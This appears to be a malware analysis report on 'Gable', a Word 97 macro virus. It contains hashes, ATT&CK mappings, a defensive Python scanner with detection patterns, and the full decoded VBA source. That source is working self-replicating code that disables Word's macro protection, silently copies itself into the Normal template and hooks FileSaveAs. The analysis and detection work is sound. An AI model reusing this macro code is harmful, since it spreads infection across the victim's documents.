Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ced45395d1c6d262…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 29.5 KB
Created: 1998-02-18 11:56:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 27e569b31c123186f53d987de50b5bc0
SHA-1: f5c0397bfb8048665a861c13c26abddf7ca6122f
SHA-256: ced45395d1c6d26286cfb545aa4da0d4c79a3efce55f42180e9cd4d9b9349b59
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1137.001 Office Application Startup: Office Template Macros (the decoded source writes a module into the Normal template; it touches no registry Run key or Startup folder, so T1547.001 is not supported by this sample)

The sample is a Word 8.0 (Word 97) document carrying a VBA module named 'Gable' whose 'AutoOpen' subroutine runs whenever the document is opened. It suppresses alerts, calls WordBasic.DisableAutoMacros 0 and sets Options.VirusProtection = False to switch off Word 97's macro warning, then checks whether a module named 'Gable' already exists in the active document and in the Normal template. Whichever copy is missing is installed with Application.OrganizerCopy: the document is re-saved as a template (wdFormatTemplate), and the Normal template is modified with SaveNormalPrompt = False so that Word writes it back without asking. Once the module lives in Normal.dot it runs in every document opened afterwards, which is the classic macro-virus persistence and self-replication mechanism. The 'FileSaveAs' subroutine is not truncated: it is a complete second copy of the same routine that first shows the real Save As dialog, so the macro shadows Word's built-in FileSaveAs command and re-runs the infection on every save. No payload beyond replication is visible in the decoded source, consistent with the 'unlikely' obfuscation/payload rating on the extracted module. Two caveats for anyone assessing this sample: the installation checks iterate over G and B but index VBComponents with the never-assigned I and J, and any error raised there is swallowed by the 'On Error GoTo Gable' handler, which exits the routine before the copy, so the reliability of the replication should be confirmed dynamically rather than assumed from the source; and the generic description attached to 'OLE_LEGACY_WORDBASIC_AUTOEXEC' ('no modern VBA project was recovered') does not apply here, since the VBA project was decoded as macros.bas under Extracted artifacts and the 'OLE_VBA_AUTOOPEN' hit points at the same AutoOpen routine.
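As an added triage example (written for this page, not the report's own tooling and not oletools or ClamAV logic): a small Python scanner that reads decoded VBA source and flags the behaviours described above, including the Normal-template write, the macro-security tampering, the auto-exec and command-shadowing subroutine names, and the loop-counter/index mismatch. The rule names, severities and verdict strings are this example's own; the embedded input is an abridged copy of the 'Gable' module shown under Extracted artifacts.

```python
"""Static triage of decoded VBA source for Normal-template infector behaviour.
Rules and names are this example's own, not oletools, ClamAV or the report's IDs."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Constructed input: an abridged copy of the 'Gable' module carved from this
# sample (see macros.bas in the report), kept to the lines the rules care about.
SAMPLE_VBA = """Attribute VB_Name = "Gable"
Sub AutoOpen()
On Error GoTo Gable
    Application.DisplayAlerts = wdAlertsNone
    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False
    For G = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Gable" Then DocumentInstalled = True
    Next
    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If
    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
    End If
Gable:
End Sub
Sub FileSaveAs()
    Dialogs(wdDialogFileSaveAs).Show
End Sub
"""

@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    line: int
    evidence: str

# Word runs Subs with these names on its own (document open/close/new).
AUTO_EXEC = {"autoexec", "autoopen", "autoclose", "autoexit", "autonew",
             "document_open", "document_close", "document_new"}
# A Sub named after a built-in command shadows that command (menu, toolbar, keyboard).
COMMAND_HOOKS = {"filesave", "filesaveas", "fileopen", "filenew", "fileclose",
                 "fileexit", "toolsmacro", "viewvbcode"}

SUB_RE = re.compile(r"^\s*(?:Public\s+|Private\s+)?Sub\s+([A-Za-z_]\w*)\s*\(", re.I)
FOR_RE = re.compile(r"^\s*For\s+([A-Za-z_]\w*)\s*=", re.I)
NEXT_RE = re.compile(r"^\s*Next\b", re.I)
INDEX_RE = re.compile(r"VBComponents\(\s*([A-Za-z_]\w*)\s*\)", re.I)

# (rule, severity, pattern): line-level indicators of template infection.
INDICATORS = [
    ("MACRO_SECURITY_DISABLED", "high", re.compile(r"Options\.VirusProtection\s*=\s*False|WordBasic\.DisableAutoMacros", re.I)),
    ("NORMAL_TEMPLATE_WRITE", "critical", re.compile(r"OrganizerCopy\b.*Destination:=\s*NormalTemplate", re.I)),
    ("NORMAL_SAVED_SILENTLY", "medium", re.compile(r"Options\.SaveNormalPrompt\s*=\s*False", re.I)),
    ("DOC_RESAVED_AS_TEMPLATE", "medium", re.compile(r"\.SaveAs\b.*FileFormat:=\s*wdFormatTemplate", re.I)),
    ("ALERTS_SUPPRESSED", "low", re.compile(r"DisplayAlerts\s*=\s*wdAlertsNone", re.I)),
]

def triage_vba(source: str) -> list[Finding]:
    """Scan one decoded module line by line and return every indicator hit."""
    findings: list[Finding] = []
    loop_var: str | None = None  # counter of the innermost open For loop
    for lineno, line in enumerate(source.splitlines(), 1):
        if m := SUB_RE.match(line):
            name = m.group(1)
            if name.lower() in AUTO_EXEC:
                findings.append(Finding("VBA_AUTOEXEC", "high", lineno, name))
            elif name.lower() in COMMAND_HOOKS:
                findings.append(Finding("VBA_COMMAND_HOOK", "high", lineno, name))
        if m := FOR_RE.match(line):
            loop_var = m.group(1)
        elif NEXT_RE.match(line):
            loop_var = None
        # Indexing the collection with a variable other than the loop counter means
        # the index is never assigned; flag it, since it decides whether the
        # "already installed" check can work at all.
        for idx in INDEX_RE.findall(line):
            if loop_var and idx.lower() != loop_var.lower():
                findings.append(Finding("LOOP_INDEX_MISMATCH", "info", lineno, f"For {loop_var} ... ({idx})"))
        for rule, severity, pattern in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(rule, severity, lineno, line.strip()))
    return findings

def rules_hit(findings: list[Finding]) -> set[str]:
    return {f.rule for f in findings}

def verdict(findings: list[Finding]) -> str:
    """Template write plus an execution hook is the self-replication pattern,
    which is a stronger signal than either indicator on its own."""
    hit = rules_hit(findings)
    hooked = bool(hit & {"VBA_AUTOEXEC", "VBA_COMMAND_HOOK"})
    if "NORMAL_TEMPLATE_WRITE" in hit and hooked:
        return "macro-virus: auto-executing module copies itself into the Normal template"
    if hit & {"NORMAL_TEMPLATE_WRITE", "MACRO_SECURITY_DISABLED", "VBA_AUTOEXEC", "VBA_COMMAND_HOOK"}:
        return "suspicious: auto-exec or security-tampering macro, no self-replication seen"
    return "no macro-virus indicators"

if __name__ == "__main__":
    hits = triage_vba(SAMPLE_VBA)
    for f in hits:
        print(f"{f.severity:8} {f.rule:24} line {f.line:2}: {f.evidence}")
    print(verdict(hits))
```

Feed it the output of olevba (or any decoded module) instead of SAMPLE_VBA to triage other samples; the verdict deliberately requires both a write into the Normal template and an execution hook before calling something a macro virus, because either alone also appears in legitimate add-in installers.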

Heuristics (4)

  • ClamAV: Doc.Trojan.Beauty-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Beauty-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  3016 bytes
SHA-256: 6cc8230c533545d5774c89dda943a9a123bba4002bfc54647e069485ce5f2d2e
Detection: ClamAV: Doc.Trojan.Elbag-1
Obfuscation or payload: unlikely

Preview of the extracted script (the report shows at most the first 1,000 lines; this module is shorter and appears in full):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Gable"

Sub AutoOpen()
On Error GoTo Gable

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    DocumentInstalled = False
    GlobalInstalled = False

    For G = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Gable" Then
            DocumentInstalled = True
        End If
    Next

    For B = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Gable" Then
            GlobalInstalled = True
        End If
    Next

    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If

    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
    End If

    Application.DisplayAlerts = wdAlertsAll

Gable:
End Sub

Sub FileSaveAs()
On Error GoTo Gable

    Dialogs(wdDialogFileSaveAs).Show

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    DocumentInstalled = False
    GlobalInstalled = False

    For G = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "Gable" Then
            DocumentInstalled = True
        End If
    Next

    For B = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "Gable" Then
            GlobalInstalled = True
        End If
    Next

    If DocumentInstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
    End If

    If GlobalInstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Gable", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
    End If

    Application.DisplayAlerts = wdAlertsAll

Gable:
End Sub